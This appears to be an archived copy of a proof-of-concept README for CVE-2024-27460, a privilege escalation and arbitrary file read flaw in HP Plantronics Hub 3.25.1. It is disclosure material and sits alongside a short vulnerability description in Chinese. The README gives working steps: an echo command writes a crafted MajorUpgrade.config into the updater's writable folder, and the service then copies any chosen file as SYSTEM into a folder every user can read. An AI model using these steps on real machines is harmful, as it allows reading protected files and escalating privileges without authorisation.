CVE-2024-27460 PoC — HP Plantronics Hub 安全漏洞

Source

https://github.com/Alaatk/CVE-2024-27460

Associated Vulnerability

Title:HP Plantronics Hub 安全漏洞 (CVE-2024-27460)
Description:HP Plantronics Hub是美国惠普（HP）公司的一个工具，提供了对 Plantronics 耳机和通信设备的管理和控制功能。 HP Plantronics Hub 3.25.1版本及之前版本存在安全漏洞。攻击者利用该漏洞可以提升权限。

Description

HP Plantronics Hub 3.2.1 Updater Privilege Escalation

Readme

# CVE-2024-27460
HP Plantronics Hub 3.25.1 Updater Privilege Escalation/Arbitrary File Read

### Description:
HP Plantronics Hub 3.25.1 suffers from a bug that allows low privileged users to perform arbitrary file read as SYSTEM on the machine where the application is installed. Moreover, it is possible to abuse this flaw to escalate privileges to the SYSTEM user.
 
### Affected versions
HP Plantronics Hub 3.25.1

### Impacted service(s)
Insecure Path:
"C:\ProgramData\Plantronics\Spokes3G"

Service:
PlantronicsUpdateService

### Steps to reproduce (POC):
- Open cmd.exe
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo ^|^|\<FULL-PATH-TO-YOUR-DESIRED-FILE\>^|> MajorUpgrade.config
- Desired file will be copied into "C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp", which any authenticated user has access to.

### Discovered by: 
* Farid Zerrouk of Deloitte Belgium
* Alaa Kachouh of Mastercard Europe

File Snapshot


 [4.0K]  /data/pocs/b16b1b53d0134131647ee3f811595a6767bf35ab
└── [ 938]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!